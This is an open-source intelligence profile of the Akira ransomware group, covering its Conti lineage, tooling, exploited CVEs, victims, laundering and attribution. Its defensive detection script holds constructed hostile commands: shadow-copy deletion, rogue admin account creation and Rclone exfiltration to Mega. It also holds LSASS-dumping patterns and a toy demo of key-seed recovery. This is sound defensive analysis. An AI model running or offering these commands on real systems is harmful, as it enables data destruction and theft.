RansomwareEDP  /  Threat Actor Library
Developed by Reno  •  Analytical profiles compiled from open-source intelligence
Threat Actor Profile — Last updated May 2026
Akira
Ransomware-as-a-Service  •  Double Extortion  •  Conti Diaspora
Critical Threat • Fully Operational RaaS
First Observed
Mar 2023
39+ months active
Total Victims (live feed)
1,492
As of May 2026
Countries Targeted (live feed)
71+
Via ransomware.live
Confirmed Revenue
$244M+
Through Sep 2025
2025 Revenue
$150M
#1 by proceeds, 2025
LE Disruptions
Zero
No takedowns, no sanctions
Lineage
Conti
Wizard Spider diaspora
01

Overview

Akira is a Russian-nexus ransomware operation that emerged in March 2023 as part of the post-Conti diaspora. Operating as a Ransomware-as-a-Service (RaaS) enterprise, the group employs double extortion: data is exfiltrated prior to encryption, creating two independent leverage points against victims. Within its first year, Akira claimed over 250 victims and extracted approximately $42 million in ransom payments. By late 2025, it had become the single most prolific ransomware strain by annual revenue.

The group is tracked across the threat intelligence community under multiple aliases. No infrastructure takedown, domain seizure, or law enforcement operation targeting Akira specifically has been publicly announced as of May 2026.

Attribute | Detail
Tracking aliases | PUNK SPIDER (CrowdStrike), GOLD SAHARA (Secureworks), Storm-1567 (Microsoft), Howling Scorpius (Unit 42)
Lineage | Conti diaspora: shared heritage with Wizard Spider / Gold Ulrick (the parent Conti organization); not itself designated Wizard Spider
Operational model | Ransomware-as-a-Service; closed RaaS with central operator control
Extortion mechanic | Double extortion (encryption plus data-publication threat); decryption and data deletion are also sold as separate purchasable options
Assessed jurisdiction | Russia / post-Soviet region (CREDIBLE)
LE disruption status | None confirmed as of May 2026
[Figure: Data Leak Site & Branding]
02

Origin & Lineage

Emergence

Akira was first observed in March 2023, with the earliest leak site discovery dated April 26, 2023. It is assessed as unrelated to a prior strain that used the same name and .akira extension in 2017. The group name is assessed as a likely allusion to the 1988 Japanese animated film of the same name (ANALYST INFERENCE; no authoritative confirmation).

Akira emerged precisely during the window in which Conti affiliates required new operational infrastructure following Conti's May 2022 public dissolution. The timing aligns with the documented dispersal of Conti personnel into successor operations including Black Basta (April 2022), BlackByte, Karakurt, Royal/BlackSuit, and Akira.

Assessed Origin
Credible — multiple independent source types converge

TRM Labs assesses Akira's developers are located in Russia or the broader post-Soviet region, citing non-VPN IP observations tied to Russia and Russian-language operator communications on dark web forums. S-RM Intelligence corroborates this assessment. The Canadian Centre for Cyber Security assessed Akira as "very likely connected" to former Conti personnel. No founding member or leadership identity has been publicly confirmed.

Conti Lineage: Four-Pillar Evidence Assessment

Attribution to former Conti / Wizard Spider personnel rests on four independent evidentiary pillars. Wizard Spider is CrowdStrike's tracking designation for the Russia-based eCrime group that operated TrickBot, Ryuk, and Conti as sequential campaigns. Secureworks tracks the same core cluster as Gold Ulrick.

Pillar 1 — Confirmed
Blockchain Forensics
Arctic Wolf Labs traced three separate Bitcoin transactions in which Akira operators sent proceeds totaling over $600,000 directly to wallet addresses previously associated with Conti/Wizard Spider leadership. TRM Labs confirmed overlapping on-chain infrastructure. This is the strongest evidentiary pillar.
Pillar 2 — Credible
Code and Behavioral Signatures
Avast Threat Labs concluded Akira's encryptor creators were "at least inspired by" leaked Conti sources, noting similarities in string obfuscation, encryption routines, and extension exclusion lists. Caveat: because Conti source code was publicly leaked February 2022, code overlap alone does not prove personnel continuity.
Pillar 3 — Confirmed (presence) / Credible (interpretation)
Language Artifacts
Akira affiliates communicate in Russian on dark web forums. The binary contains a hard-coded check for Russian keyboard layout but does not halt execution when detected — a deliberate deviation from standard CIS-exclusion behavior that may be intended to obscure attribution.
Pillar 4 — Credible
Temporal & Operational Context
Akira emerged in March 2023 — precisely when Conti affiliates required new infrastructure post-dissolution. Analyst1 (February 2026) describes the post-Conti network as "a loose federation of rebranded cells sharing tooling and infrastructure rather than a unified hierarchy."
Overall assessment: Akira is most accurately described as part of the Conti/Wizard Spider diaspora — a separate operational entity staffed by former Conti-affiliated operators carrying shared TTPs, laundering infrastructure, and operational playbook. It is not Conti rebranded in the formal sense. The Wizard Spider core operator tier is assessed as having moved primarily into Royal/BlackSuit; Akira represents affiliate and mid-tier operator continuity with leadership-level financial linkage through the blockchain evidence.
Vendor Tracking Designations: Disambiguation

Wizard Spider (CrowdStrike) and Gold Ulrick (Secureworks) designate the core Russia-based criminal organization that operated TrickBot, Ryuk, and Conti. Neither designation has been extended to Akira or any specific Conti successor group. They describe shared heritage, not operational identity.

Akira's own vendor-specific tracking designations are: PUNK SPIDER (CrowdStrike, first flagged April 2023, defined as the Big Game Hunting adversary responsible for developing and maintaining Akira ransomware), GOLD SAHARA (Secureworks), Storm-1567 (Microsoft), and Howling Scorpius (Palo Alto Unit 42).

The Royal/BlackSuit branch is tracked separately by CrowdStrike as ROYAL SPIDER, confirming organizational separation between the two major post-Conti successor streams. Secureworks maintains a parallel separation: GOLD SAHARA covers Akira while a distinct designation covers the Royal/BlackSuit lineage. The practical implication: Wizard Spider and Gold Ulrick are correct as shared heritage designators for the parent organization, but the operational aliases for Akira itself are exclusively PUNK SPIDER, GOLD SAHARA, Storm-1567, and Howling Scorpius.

03

Operational Model

RaaS Structure

Akira operates as a closed RaaS enterprise (Unit 42 characterization). The affiliate revenue split is not publicly confirmed; Blackpoint Cyber assesses an 80/20 split (80% affiliate, 20% operator) consistent with the modern RaaS standard. S-RM Intelligence notes that Akira maintains control over ransom demands and the discounts affiliates can offer, indicating operator-side leverage even when affiliates conduct individual attacks. The affiliate pool is heterogeneous: S-RM observed "considerable variation in tooling and methodologies among different Akira affiliates."

TRM Labs' on-chain analysis confirms that early payment flows (2023) can be grouped by likely affiliate based on consistent wallet behaviors, providing the clearest structural evidence of the affiliate layer.

Double Extortion Mechanic

Akira employs a sequential extortion model:

  • Exfiltration first: Data is exfiltrated prior to encryption. In some 2025 incidents, exfiltration completed within two hours of initial access.
  • Encryption extortion: Victims must pay for decryption keys to restore systems.
  • Publication threat: Victims must pay separately to prevent data publication on Akira's Tor-based Dedicated Leak Site (DLS).
  • Disaggregated payment option: Akira uniquely offers victims the ability to pay for decryption or data deletion separately — a tactic to lower the payment threshold for victims with functional backups.

Beginning in early 2024, Akira temporarily abandoned encryption entirely, focusing on exfiltration-only extortion — assessed by Cisco Talos as reflecting developer retooling time for a new encryptor. Full double extortion resumed by mid-to-late 2024.

Negotiation Behavior

Negotiation is conducted through a Tor-based portal, accessed with the unique ID printed in the ransom note. Ransomware.live has archived 61 negotiation chat logs spanning May 2023 through April 2025.

Avg. Demand Reduction (internal data)
62.1%
Off initial demand (Q4 2023, n=10)
Median Reduction (internal data)
52.7%
Range: 37.5% to 96.0%
Avg. Days to Payment (internal data)
22 days
Median: 21 days — min 1, max 63
Attack to Publication
54.5 days
Average per ransomware.live
Analytical note: Internal data from Q4 2023 shows negotiation reductions ranging from 37.5% to 96.0% off the initial demand, including a $10M initial demand settled at $400K (96% reduction) and a $3M demand settled at $250K (91.7% reduction). This undercuts the S-RM characterization above of operator-controlled discount floors: whatever floor the operators set for affiliates, in practice it is highly flexible under sustained negotiation pressure.
  • Negotiations begin promptly, often within hours of encryption deployment
  • Operators demonstrate familiarity with victim financials (revenue, insurance coverage)
  • Ransom demands are set opportunistically based on victim profile
  • Publication threat escalates during stalled negotiations
04

Technical Profile

Malware Variants
Variant | Language | Extension | Period | Notes
Akira v1 | C++ | .akira | Mar–Jul 2023 | Initial release; Avast decryptor released Jun 2023
Akira v1 (patched) | C++ | .akira | Jul 2023+ | Fixed the decryption flaw; ransom note: akira_readme.txt
Megazord | Rust | .powerranges | Aug 2023+ | Rust-based; deployed alongside the C++ variants
Akira v2 | Rust | .akira / .aki | 2023–2024 | Additional Rust variant; multiple extension variants
Akira (C++ return) | C++ | .akira | Sep 2024+ | Talos: reversion to C++ after the retooling period
Encryption Scheme

Hybrid encryption: ChaCha20 for file content, RSA-4096 to protect the per-file keys. The symmetric cipher gives speed; the asymmetric wrap means a file key cannot be recovered from the ciphertext without the operator-held private key. That guarantee holds only if the file keys are generated unpredictably, which is exactly the assumption the Linux/ESXi variant violated (see the Tinyhack GPU brute-force method below). Volume Shadow Copies (VSS) are deleted via PowerShell/WMI to prevent recovery from snapshots.

Hypervisor Targeting
  • VMware ESXi (April 2023+): Linux variant uses esxcli and vim-cmd to gracefully shut down VMs before encrypting virtual disk files.
  • Nutanix AHV (June 2025): First documented attack against Nutanix hypervisor environments. Directly encrypts .qcow2 files without native management commands.
  • Microsoft Hyper-V: Also targeted per updated CISA advisory.
Initial Access Methods
Vector | Notes
VPN exploitation without MFA | Dominant vector: brute force, credential stuffing, or access purchased from an initial access broker (IAB)
CVE exploitation | Primarily Cisco ASA/FTD and SonicWall; see the CVE table below
Remote Desktop Protocol (RDP) | Stolen or brute-forced credentials
Spear phishing | Credential harvesting
SSH exploitation | SSH access to network devices combined with IP tunneling through routers
Valid credentials (IAB purchase) | ~19.5% of Akira victims had an infostealer infection exposed in credential markets
Key CVEs Exploited
CVE | Product | CVSS v3 base | Type
CVE-2020-3259 | Cisco ASA/FTD | 7.5 | Information disclosure
CVE-2023-20269 | Cisco ASA/FTD | N/A | Authentication bypass (remote access VPN)
CVE-2024-40766 | SonicWall SonicOS SSL-VPN | 9.3 | Improper access control
CVE-2024-37085 | VMware ESXi | 6.8 | Authentication bypass (AD group membership)
CVE-2023-27532 | Veeam Backup & Replication | 7.5 | Missing authentication
CVE-2024-40711 | Veeam Backup & Replication | 9.8 | Deserialization (RCE)
CVE-2023-28252 | Windows CLFS | 7.8 | Privilege escalation
CVE-2022-40684 | Fortinet FortiOS | 9.8 | Authentication bypass
Kill Chain Toolset
Phase | Tools
Discovery | Advanced IP Scanner, BloodHound, Masscan, SharpHound, AdFind, SoftPerfect NetScan
Credential Access | Mimikatz, LaZagne, Rubeus, SharpDomainSpray (Kerberoasting, LSASS dumping)
Persistence | Local/domain account creation (e.g., itadm), added to the Administrators group
Lateral Movement | RDP, SSH, MobaXterm, Impacket (wmiexec.py), CrackMapExec, NetExec
C2 / Remote Access | AnyDesk, TeamViewer, MeshAgent, RustDesk, ScreenConnect; Ngrok/Cloudflared for tunneling
Defense Evasion | PowerTool (Zemana driver abuse), EDR uninstall, POORTRY/BurntCigar BYOVD, log clearing
Exfiltration | FileZilla, WinSCP, RClone (to Mega), WinRAR, Temp.sh
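The toolset above is, for a defender, a list of process-creation events to alert on. The following Python is an added example, not code from this page or from any vendor: it runs a handful of rules derived from the table (shadow-copy deletion via vssadmin or WMI, local account creation and Administrators-group membership, Rclone pushing to a Mega remote, remote-access tool installation, LSASS dumping) over constructed Sysmon-style process-creation events, and escalates a host when two or more distinct kill-chain phases fire within a short window. The JSON field names, the sample events and the regular expressions are all assumptions made for the example; the patterns are illustrative, not published signatures.

```python
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Sysmon-style process-creation events; field names and values are assumptions.
SAMPLE_EVENTS = r"""
{"ts": "2025-09-14T02:11:05Z", "host": "FS01", "image": "C:\\Windows\\System32\\net.exe", "cmdline": "net user itadm Summer2025! /add"}
{"ts": "2025-09-14T02:11:09Z", "host": "FS01", "image": "C:\\Windows\\System32\\net.exe", "cmdline": "net localgroup administrators itadm /add"}
{"ts": "2025-09-14T02:55:40Z", "host": "FS01", "image": "C:\\Users\\itadm\\rclone.exe", "cmdline": "rclone.exe copy D:\\Finance mega:exfil --transfers 8 -q"}
{"ts": "2025-09-14T03:40:02Z", "host": "FS01", "image": "C:\\Windows\\System32\\vssadmin.exe", "cmdline": "vssadmin.exe delete shadows /all /quiet"}
{"ts": "2025-09-14T03:40:03Z", "host": "FS01", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell -c Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_.Delete() }"}
{"ts": "2025-09-14T09:02:00Z", "host": "WS07", "image": "C:\\Users\\jsmith\\Downloads\\AnyDesk.exe", "cmdline": "AnyDesk.exe --install C:\\Program Files\\AnyDesk --silent"}
{"ts": "2025-09-14T09:10:00Z", "host": "WS07", "image": "C:\\Windows\\System32\\net.exe", "cmdline": "net user jsmith"}
"""

# (kill-chain phase from the table above, rule name, image basenames that must match
#  (empty = any image), command-line pattern). Patterns are illustrative assumptions.
RULES = [
    ("Defense Evasion", "shadow_copy_deletion", (),
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete|Win32_Shadowcopy", re.I)),
    ("Persistence", "local_account_created", ("net.exe", "net1.exe"),
     re.compile(r"\buser\s+\S+\s+\S+\s+/add\b", re.I)),
    ("Persistence", "admin_group_membership_added", ("net.exe", "net1.exe"),
     re.compile(r"\blocalgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("Exfiltration", "rclone_to_mega", ("rclone.exe",),
     re.compile(r"\b(copy|sync|move)\b.*\bmega:", re.I)),
    ("C2 / Remote Access", "remote_access_tool_install", (),
     re.compile(r"\b(anydesk|teamviewer|meshagent|rustdesk|screenconnect)\b.*(--install|/silent|--silent)", re.I)),
    ("Credential Access", "lsass_dump", (),
     re.compile(r"sekurlsa::logonpasswords|procdump.*\blsass\b|comsvcs\.dll.*MiniDump", re.I)),
]


def parse_events(text):
    """One JSON object per line; blank lines are ignored."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def match_rules(event):
    """Return [(phase, rule_name)] for every rule the event satisfies."""
    image = event.get("image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    cmdline = event.get("cmdline", "")
    hits = []
    for phase, name, images, pattern in RULES:
        if images and image not in images:
            continue
        if pattern.search(cmdline):
            hits.append((phase, name))
    return hits


def detect(text, window=timedelta(hours=4)):
    """Per-host findings. A host is escalated when two or more distinct kill-chain phases
    fire within `window` of its first hit. The 4-hour default reflects the sub-4-hour
    intrusions reported on this page; a lone remote-access tool install stays low severity."""
    per_host = defaultdict(list)
    for ev in parse_events(text):
        ts = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))
        for phase, name in match_rules(ev):
            per_host[ev["host"]].append((ts, phase, name))
    findings = {}
    for host, hits in per_host.items():
        hits.sort()
        first = hits[0][0]
        phases = {phase for ts, phase, _ in hits if ts - first <= window}
        findings[host] = {
            "hits": [(name, phase) for _, phase, name in hits],
            "phases": sorted(phases),
            "escalate": len(phases) >= 2,
        }
    return findings


if __name__ == "__main__":
    for host, finding in detect(SAMPLE_EVENTS).items():
        print(host, "ESCALATE" if finding["escalate"] else "low", finding["phases"])
```

On the constructed input, FS01 trips persistence, exfiltration and defense-evasion rules inside ninety minutes and is escalated; WS07 shows only a remote-access tool install and is not. The phase-correlation step is the part worth keeping: each individual rule is noisy in an enterprise (help desks install AnyDesk, backup jobs touch shadow copies), but the page's own kill chain is what makes two phases on one host within hours a strong signal.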
05

Targeting

Sector Distribution (ransomware.live, May 2026)
Sector | Victim Count | Notes
Manufacturing | 352 | Largest single sector
Business Services | 313 |
Construction | 132 |
Technology | 129 |
Consumer Services | 96 |
Healthcare, Finance, Education, Legal | Significant | No formal sector exclusions documented

Dragos reported Akira linked to 83 industrial-sector incidents in Q1 2025 alone, approximately 12% of all tracked industrial ransomware activity that quarter. The November 2025 CISA advisory documented Akira attacks on 34 financial organizations between April 2024 and April 2025. FinCEN identified Akira as the most-reported ransomware variant in Bank Secrecy Act filings for the 2022–2024 review period.

Geographic Distribution
Country | Victim Count | % of Total
United States | 830 | 55.6%
Canada | 77 | 5.2%
Germany | 67 | 4.5%
United Kingdom | 38 | 2.5%
Italy | 34 | 2.3%
Other (66 countries) | 446 | 29.9%

No CIS-region victims documented in any open-source database. Country data from internal records (Q3 2025+) confirms US dominance with additional payments confirmed from Spain, Canada, Ireland, United Kingdom, and Australia.

Victim Profile and Selection Model

Primary profile: Small-to-medium enterprises (SMEs). S-RM Intelligence documented 86% of Akira victims have fewer than 1,000 employees.

Selection model: Primarily opportunistic, driven by available initial access (VPN exposure) rather than deliberate sector pre-selection. However, affiliates are assessed to exercise judgment in prioritizing targets with critical data dependencies, cyber insurance, and high operational disruption sensitivity.

06

Victim Data

Leak Site Victims
1,492
As of May 22, 2026
FBI-Confirmed Victims
342+
Through Nov 2025 advisory
Internal Case Records (internal data)
85
64 with confirmed payment
Data Leak Rate
23%
79 of 342 named victims (S-RM)
Quarterly Victim Volume
Period | Approx. Victims | Confidence
Q2–Q4 2023 | ~250 (partial year) | ANALYST INFERENCE for the quarterly split; CONFIRMED annual total
2024 (full year) | ~430 | CREDIBLE (FBI advisory reference)
Jan 1–Dec 11, 2025 | ~980 | CONFIRMED (TRM Labs)
Q1 2026 | ~150+ | CREDIBLE; 84 in March alone (second most active month on record)
Notable Named Victims
Victim | Sector | Date | Notes
Stanford University | Education | Sep 2023 | 27,000 individuals notified
Nissan Australia | Automotive | Jan 2024 | 100,000 customers' data compromised
Tietoevry (Finland) | IT Services | Jan 2024 | Major Finnish IT provider; disrupted multiple Swedish client systems
Lush Cosmetics (UK) | Retail | 2023 | Confirmed victim
Toronto Zoo | Public Institution | Jan 2024 | Canadian critical infrastructure
Stoli Group | Food and Beverage | 2024 | Evidence of strategic coordination (Halcyon)
07

Financial Profile

Documented Revenue
Source | Period | Amount | Confidence
FBI/CISA Joint Advisory (Apr 2024) | Through Jan 2024 | $42M | Confirmed
FinCEN Financial Trend Analysis (Dec 2025) | Apr 2023–Dec 2024 | $120.9M (376 BSA filings) | Confirmed
FBI/CISA Updated Advisory (Nov 2025) | Through Sep 2025 | $244.17M | Confirmed
TRM Labs Intel Library | 2025 full year | $150M | Confirmed

Akira was identified as the most prolific ransomware strain by total ransom proceeds in 2025, collecting $150M, nearly twice the second most active strain. FinCEN named Akira the most-reported variant in BSA data for the 2022–2024 review period.

Payment Profile (internal data, 85 cases)
Median Payment
$200,000
Confirmed (n=64 payments)
Mean Payment
$423,851
Confirmed (n=64 payments)
Minimum
$43,000
Confirmed
Maximum
$3,000,000
Confirmed
Total Confirmed Paid
$27.1M
64 confirmed payments
Wallet Type
100%
Bitcoin (bc1 SegWit) across all records

Published demand range (open source): $200,000 to over $4 million USD. Demands set opportunistically based on victim financial profile, insurance coverage, and assessed data value.

Laundering Infrastructure: Four Documented Phases
I
2023 — Affiliate-Level Clustering
Payment flows grouped by affiliate based on consistent on-chain behaviors, including reused intermediary addresses. Maximum on-chain visibility for attribution purposes.
II
Early–Mid 2024 — WanChain Bridge Centralization
Shift to centralized laundering via WanChain bridge. Most victim payments funneled through a single WanChain address before dispersal to multiple global VASPs for cash-out.
III
Late 2024 — Defiway Bridge
Transition to Defiway bridge. Critically, Fog ransomware used the same Defiway approach during this period — providing on-chain evidence of infrastructure sharing or operational cooperation between Akira and Fog.
IV
August 2025–Present — Per-Victim Addresses + HTX
Each payment passes through a unique intermediary address, then aggregates across two consolidation addresses, before off-ramping at HTX (formerly Huobi). Admin-affiliate revenue split occurs only after funds reach the shared VASP cash-out address, keeping the split opaque on-chain.
Connected group signal (Akira-Fog: CONFIRMED): Chainalysis (2025 Crypto Crime Report) confirmed Akira and Fog employed identical laundering methods distinct from all other ransomware strains. Arctic Wolf documented shared IP infrastructure between Akira and Fog affiliates in late 2024. Sophos X-Ops designated the combined Akira-Fog activity as STAC 5881 (Sophos Threat Activity Cluster 5881), characterizing the two groups as operating within a unified affiliate infrastructure sharing initial access methods, credential abuse patterns, and on-chain laundering tradecraft. The Akira-Fog connection does not require single-operator control; evidence points to deliberate infrastructure sharing at the affiliate layer.
08

Attribution & Nexus

Assessed Jurisdiction
Credible — Russia or broader post-Soviet region

Evidence basis: Russian-language operator communications on dark web forums; non-VPN IP observations tied to Russia; wallet infrastructure overlapping with Conti-affiliated addresses tied to formally sanctioned Russia-based operators. No contradicting evidence in open source.

CIS Exclusion Behavior
Confirmed — No keyboard-layout kill switch present in binary

The Akira binary checks for a Russian keyboard layout but does not halt execution when one is found, so it lacks the kill switch present in virtually all other Russian-linked ransomware families. Despite the absence of this technical safeguard, no CIS-region victims appear in any open-source database.

ANALYST INFERENCE: Operator-level targeting guidance to affiliates produces the same CIS-exclusion outcome through a different mechanism. The absence of the technical kill switch may be a deliberate choice to obscure Russia-origin attribution while achieving the same practical result.
Arrests and Named Individuals
As of May 2026: No indictments, OFAC sanctions, or criminal charges have been publicly filed against any member of Akira's core operating team. TRM Labs (March 2026) states explicitly that Akira has not been subject to OFAC sanctions, criminal indictments, or a law enforcement disruption operation.

One confirmed arrest is tied to the Conti organizational entity that operated Akira:

Attribute | Detail
Individual | Deniss Zolotarjovs, 35, Latvian national residing in Moscow
Arrest | Georgia (the country), December 2023
Transfer | U.S. custody, August 2024
Outcome | Pleaded guilty July 2025; sentenced to 102 months (8.5 years) on May 3, 2026
Role | Ransom negotiation escalator; weaponized sensitive personal data (including children's health records) to pressure non-paying victims
Scope | June 2021–August 2023; 54+ companies; $56M+ documented losses across 13 confirmed victims
Critical nuance | Involvement predates Akira's March 2023 standalone emergence. The prosecution covers organizational continuity between the Conti-led parent entity and Akira as a successor brand, not Akira-specific post-2023 activity.

DOJ sentencing documents explicitly name Akira as one of the brands used by a Conti-led organization whose members "included multiple former Russian law enforcement officers" who "co-opted Russian government databases and law enforcement connections." The organization also paid bribes to exempt members from military conscription and maintained a structured presence in St. Petersburg.

Russian Intelligence Services Nexus Assessment
Analyst Inference — No confirmed direct RIS nexus. Ecosystem-level intelligence-adjacent relationships documented at organizational level.

No publicly confirmed direct tasking or control relationship between Akira's operators and Russian state intelligence services (FSB, SVR, or GRU) exists as of May 2026. However, the post-Conti/Wizard Spider ecosystem has documented intelligence-adjacent relationships:

  • Recorded Future Dark Covenant 3.0 (October 2025): Leaked Conti communications show senior Conti figures provided data to both GRU and SVR. One operator ("Professor") maintained a paid informant or bribery relationship with SVR contacts.
  • Vitalii Kovalev (Conti alias: Stern/Bentley): Assessed by German BKA and confirmed via leaked Qakbot developer chats as "linked to the FSB."
  • DOJ sentencing documents (Zolotarjovs): Organization described as including "multiple former Russian law enforcement officers" who "co-opted Russian government databases."
Framework assessment (Recorded Future): Russia's posture toward groups like this is characterized as "conditional controlled impunity" — not uniform protection, but a managed market where groups useful to the state are insulated while peripheral facilitators are sacrificed under Western pressure. Given Akira's financial scale ($244M+) and Wizard Spider heritage, it fits the category that would receive insulation rather than exposure. A protection relationship should be treated as likely but unconfirmed pending source-level intelligence.
09

Disruption History & Known Vulnerabilities

Avast Decryptor (June 2023)

The only confirmed technical disruption action: Avast released a free decryptor on June 29, 2023 targeting the original C++ Windows variant. Akira patched the encryption flaw within four days (July 2, 2023), demonstrating active development capacity. A Rust-based Megazord variant followed in August 2023. No publicly released decryptor exists for any subsequent Akira variant as of May 2026.

Tinyhack GPU Brute-Force Method (March 2025)
Exploitable technical vulnerability confirmed for Linux/ESXi variant (2024). Patch status not confirmed in open source as of May 2026.
Attribute | Detail
Root cause | generate_random() seeds from get_current_time_nanosecond(): a nanosecond timestamp is guessable, not unpredictable. The seed is run through 1,500 SHA-256 rounds via the Yarrow256 PRNG, which makes each guess more expensive but adds no entropy.
Attack method | Known-plaintext attack against VMware file headers (flat VMDK, sesparse, NVRAM). ESXi file timestamps bound the candidate seeds.
Search space | ~4.5 quadrillion (timestamp) pairs; practical with GPU acceleration
Practical cost | 16 x RTX 4090 GPUs (cloud-rentable); ~10 hours recovery time; ~$261 per one-second range searched
Status | Full source published to GitHub (March 2025). Patch status unconfirmed.
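The table above and the Encryption Scheme paragraph in section 04 make the same point from two directions: RSA-4096 key wrapping is irrelevant if the wrapped key was derived from a guessable timestamp. The following Python is an added example, not Tinyhack's tool or Akira's code: it models a timestamp-seeded key derivation (nanosecond seed hashed 1,500 times, standing in for the Yarrow256 path), encrypts a constructed VMDK-style header with a hash-counter keystream standing in for ChaCha20, and then recovers the seed by known-plaintext search over a timestamp window without touching the wrapped key. The 200-nanosecond window, the constructed header bytes and the stand-in primitives are assumptions; the real search space and GPU cost are the figures in the table.

```python
import hashlib

ROUNDS = 1500           # page: seed passed through 1,500 SHA-256 rounds
VMDK_MAGIC = b"KDMV"    # known plaintext: magic at offset 0 of a VMware hosted sparse extent


def derive_key(seed_ns: int) -> bytes:
    """Simplified model of a timestamp-seeded derivation: hash the nanosecond timestamp
    ROUNDS times. Stands in for the Yarrow256 path the page names; not the encryptor's
    code. The property it preserves: the only entropy entering the key is the timestamp."""
    state = seed_ns.to_bytes(8, "little")
    for _ in range(ROUNDS):
        state = hashlib.sha256(state).digest()
    return state


def keystream(key: bytes, length: int) -> bytes:
    """Hash-counter keystream standing in for ChaCha20 so the example needs only the stdlib."""
    out = bytearray()
    block = 0
    while len(out) < length:
        out += hashlib.sha256(key + block.to_bytes(8, "little")).digest()
        block += 1
    return bytes(out[:length])


def xor_stream(data: bytes, key: bytes) -> bytes:
    """Encrypt or decrypt; an XOR stream cipher is its own inverse."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))


def recover_seed(ct_head: bytes, known_head: bytes, window_start_ns: int, window_end_ns: int):
    """Known-plaintext search: derive the key for every candidate timestamp in the window
    and accept the first one that turns the ciphertext header back into the known header.
    Returns the seed or None. Each candidate costs ROUNDS hashes, which is why the real
    ~4.5 quadrillion candidate space needs GPUs rather than a Python loop."""
    for seed in range(window_start_ns, window_end_ns):
        if xor_stream(ct_head, derive_key(seed)) == known_head:
            return seed
    return None


def demo():
    """Constructed sample: a fake VMDK header (magic + version 1) plus filler, encrypted
    under a timestamp seed, then recovered from the header alone."""
    plaintext = VMDK_MAGIC + (1).to_bytes(4, "little") + b"\x00" * 28
    true_seed = 1_718_000_000_123_456_789        # constructed "nanoseconds since epoch"
    ciphertext = xor_stream(plaintext, derive_key(true_seed))
    # The file's mtime and the observed encryption rate bound the seed; here a 200 ns window.
    seed = recover_seed(ciphertext[:8], plaintext[:8], true_seed - 120, true_seed + 80)
    recovered = xor_stream(ciphertext, derive_key(seed)) if seed is not None else None
    return seed, recovered


if __name__ == "__main__":
    found, header = demo()
    print("seed:", found, "recovered header:", header[:8] if header else None)
```

Eight bytes of known header are enough here because 200 candidates cannot produce a 64-bit false positive; the real attack checks more header bytes because its candidate space is fifteen orders of magnitude larger. The defensive reading for an incident responder is the one the page's Tinyhack entry already implies: before paying for an ESXi decryptor, establish which Akira build encrypted the datastore and whether its key derivation is the timestamp-seeded one.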
Government Advisories
  • April 18, 2024 (AA24-109A): FBI, CISA, Europol EC3, Netherlands NCSC-NL. Original advisory covering TTPs and IOCs through February 2024.
  • November 13, 2025 (AA24-109A Rev.): FBI, CISA, DC3, HHS, Europol EC3, France's OFAC (Office Anti-cybercriminalité, not the U.S. Treasury office of the same acronym), Germany's LKA Baden-Württemberg, Netherlands NCSC-NL. Added Nutanix AHV targeting and an expanded CVE list including SonicWall CVE-2024-40766.

Both advisories are information-sharing products (victim notification, TTP and IOC publication) rather than direct disruption actions. No infrastructure seizures or arrests resulted from either.

No Infrastructure Takedown
Confirmed — Zero law enforcement disruption events as of May 2026

Akira has operated for over 39 months without a direct law enforcement disruption event, making it one of the most durable major ransomware operations in the post-Conti period. No WAIS-scoreable events on record.

Operational Vulnerabilities
  • Geographic exposure: Zolotarjovs arrest in Georgia demonstrates that travel outside Russia to non-extradition-treaty countries is an exploitable exposure point.
  • On-chain attribution: Centralized laundering infrastructure (Defiway, WanChain, HTX) creates durable attribution opportunities. TRM Labs has successfully grouped affiliate payment flows through wallet cluster analysis and identified the primary cash-out exchange.
  • Affiliate trust fragmentation: Recorded Future documented increasing affiliate disputes across the RaaS ecosystem post-Operation Endgame, including non-payment scams — a pattern affecting Akira's peer groups and a potential OPSEC exposure vector.
10

Status & Trajectory

Fully Operational. Akira's leak site was last accessed May 23, 2026 with victims posted as recently as May 22, 2026. In April 2026, Qilin surpassed Akira as the most active group for that month — Akira remains closely behind at roughly the same activity level as March.
Total Victims
1,492
71 countries, May 2026
2025 Victims
~980
Jan 1–Dec 11, 2025
YoY Volume Change
+120%
2024 to 2025
Strife Events
Zero
No rebranding, fragmentation signals
Trajectory Assessment
Analyst Inference — Continued high-tempo operations at or above 2025 levels

All trajectory indicators are uniformly expansionary: volume rising, revenue rising, geographic expansion continuing, capability expanding (Nutanix AHV added June 2025, kill chain accelerating to sub-4 hours per Halcyon April 2026), and laundering sophistication increasing through four phase rotations in three years.

The absence of any law enforcement disruption event combined with rising revenue and victim volume suggests Akira has established a durable operational posture. The broader TRM-identified cluster (Fog, Frag, Anubis sharing laundering infrastructure) suggests Akira may function as an operational hub anchoring a wider affiliate ecosystem — consistent with a mature RaaS structure where high-trust affiliates work across multiple brands simultaneously.

CONFIRMED — Akira-Fog cluster: Arctic Wolf shared IP infrastructure; TRM Defiway bridge sharing; Sophos STAC 5881 designation. Evidence is multi-source and independent.
CREDIBLE — Frag-Akira relationship: TRM Labs assessed Frag as a potential Akira extension based on shared wallet clusters and identical bridge infrastructure. Sophos X-Ops and Agger Labs characterize Frag as a technique-sharing actor rather than a direct Akira extension. BlackFog tracks Frag as independent. Neither Mandiant nor Recorded Future have published a formal assessment. TRM on-chain evidence supports affiliation-level overlap; organizational integration is not established.

Sources

Primary Government Sources
[1]FBI/CISA/EC3/NCSC-NL Joint Advisory AA24-109A, April 18, 2024 — ic3.gov
[2]FBI/CISA Updated Advisory AA24-109A Rev., November 13, 2025 — ic3.gov
[3]FinCEN Financial Trend Analysis on Ransomware, December 2025 — fincen.gov
[4]Canadian Centre for Cyber Security: Ransomware Threat Outlook 2025–2027 — cyber.gc.ca
[5]DOJ: Member of Prolific Russian Ransomware Group Sentenced, May 2026 — justice.gov
Threat Intelligence Reports
[6]TRM Labs: Akira Ransomware Threat Profile (March 2026) — trmlabs.com
[7]TRM Labs: New Disruption Opportunities in the Evolving Ransomware Ecosystem (April 2026) — trmlabs.com
[8]Recorded Future: Dark Covenant 3.0 (October 2025) — recordedfuture.com
